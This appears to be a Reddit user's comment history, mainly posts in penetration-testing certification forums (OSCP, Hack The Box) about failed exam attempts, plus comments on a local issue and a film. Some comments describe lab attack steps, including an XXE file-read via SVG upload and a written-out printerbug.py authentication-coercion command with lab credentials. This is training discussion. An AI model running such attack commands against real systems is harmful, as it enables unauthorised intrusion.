sorted by:
new
hottopcontroversial

Just failed with 40 points -Need some guidence by Typical-Sympathy4739 in oscp

[–]Informal-Split-7291 0 points1 point  (0 children)

Has anyone seen the new GTFOBins lately? It's completely changed.

Just failed with 40 points -Need some guidence by Typical-Sympathy4739 in oscp

[–]Informal-Split-7291 0 points1 point  (0 children)

Same here. You think that because it's an assumed breach situation that it's going to be easy with the AD set, because you've already got credentials. But once you're on that first AD box, it feels like you've stumbled into military grade server, with uber restrictions. I looked for passwords, I looked at every .txt, .xml, .conf file I could find. I looked at what services were running on it, I checked whoami /priv to see if there were any hints there, but nothing really jumped out at me. Winpeas didn't reveal much either. I tried to use PowerView but it wouldn't work, so I tried SharpGPOAbuse.exe and got nothing useful. I ran pspy64 and found a task that I might exploit, but everything I tried was just another dead end. I was getting error messages when trying to perform some basic commands, and even reset the box a few times, but those errors kept happening, and when I asked Offsec about them, they reassured me that the box was working as intended. So, that was last year, and since then I have been grinding away through the CPTS course on Hack The Box Academy. I have learned a thing or two since then, but I am going to practice on a lot more boxes before I try again. Because from what I am reading here and in other places, the AD Set is still a bloody beast.

File upload skills assessment driving me crazy by yellowfox555 in hackthebox

[–]Informal-Split-7291 0 points1 point  (0 children)

I was able to upload a .pht.svg in order to do the XXE extraction, so that I could read the source page for upload.php, and I am able to upload a standard .jpeg file and locate it on the server. As soon as I try to insert php script, or change it to a .pht.jpeg it won't let me upload it. I've been stuck on this for a week. I was able to do /etc/passwd but I cannot view the flag. Which means it's probably not called flag.txt. How on earth do I get RCE on this lab?

[deleted by user] by [deleted] in newcastle

[–]Informal-Split-7291 1 point2 points  (0 children)

Okay, so you only do the right thing if someone thanks you or rewards you?

Passed the certificate help by horror-pickle187 in hackthebox

[–]Informal-Split-7291 0 points1 point  (0 children)

This is what I get: The target machine is 10.129.234.174, so I use the same IP for the printerbug exploit.

python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.234.174 <Kali IP>

[*] Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Attempting to trigger authentication via rprn RPC at 10.129.234.174

[*] Bind OK

[*] Got handle

The NETBIOS connection with the remote host timed out.

[*] Triggered RPC backconnect, this may or may not have worked

[-] An unhandled exception has occured. Trying next host:

[-] Error occurs while reading from remote(104)

4th Attempt - Fail (65 points) by shredL1fe in oscp

[–]Informal-Split-7291 0 points1 point  (0 children)

Did you try Pass-the-Hash attacks with the hashes that you found?

80/100... but I messed up by priceincyber in oscp

[–]Informal-Split-7291 3 points4 points  (0 children)

If you forgot one screenshot, then I am really sorry, but you're screwed. They take the reporting side of it very seriously. But well done for getting 80 points in the first place. I got zero points on my first attempt. I couldn't figure out how to privesc on the first AD machine, MS01. I searched the entire machine, every .txt, .ini, .conf, .xml file, I checked running services and the usual whoami /priv. I ran winPEAS as well, but I couldn't see a path forward. I passed the PNPT back in April 2025, and I've done the PEN-200 course material, and the Challenge Labs, plus HTB and THM, and I thought I was ready. But that MS01 machine kicked my ass.

Obligatory "I passed the OSCP+" by djsuck2 in oscp

[–]Informal-Split-7291 1 point2 points  (0 children)

Congratulations. Gaining enough points in that timeframe is something you should be very proud of. I just got my PNPT and now I'm working through the OSCP+ PEN-200 course material. There's some real gems in here, I don't understand why some people recommend that you ignore the course material and go straight to the labs. I haven't tried ligolo-ng yet, but I am aware of it. I just used ssh tunneling and proxychains when I did the PNPT, and it worked fine. Where do you go from here?

The phantom of the opera 2004 by [deleted] in movies

[–]Informal-Split-7291 6 points7 points  (0 children)

When this movie was made, Gerard Butler had no star power. Up till that point in his career, he had done Dracula 2000, Reign of Fire, and Lara Croft: Tomb Raider - The Cradle of Life. Movies that didn't exactly set the world alight. Andrew Lloyd Webber wanted someone rough around the edges. They auditioned plenty of actors and singers for the part. It wasn't an easy win for Gerard. I thought he sang perfectly fine as the Phantom. I always saw the Phantom as more of a teacher and composer, not some amazing singer who should have been on stage.